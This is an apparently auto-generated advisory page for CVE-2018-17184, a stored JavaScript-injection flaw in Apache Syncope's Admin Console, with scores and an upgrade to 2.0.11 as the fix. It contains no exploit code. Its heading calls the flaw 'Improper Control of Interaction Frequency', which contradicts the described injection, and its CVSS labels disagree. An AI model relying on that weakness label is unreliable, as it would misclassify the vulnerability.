CVE-2018-17184
Improper Control of Interaction Frequency in Apache syncope-core
5.4
MEDIUM
CVSS 3.1
EPSS 1.0%
Description
A malicious user with enough administration entitlements can inject html-like elements containing JavaScript statements into Connector names, Report names, AnyTypeClass keys and Policy descriptions. When another user with enough administration entitlements edits one of the Entities above via Admin Console, the injected JavaScript code is executed.
How to fix CVE-2018-17184
To remediate CVE-2018-17184, upgrade the affected package to a fixed version below.
- —upgrade to 2.0.11 or later
Is CVE-2018-17184 being exploited?
Low — EPSS is 1.0%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 2.0.11
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM5.4 | CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |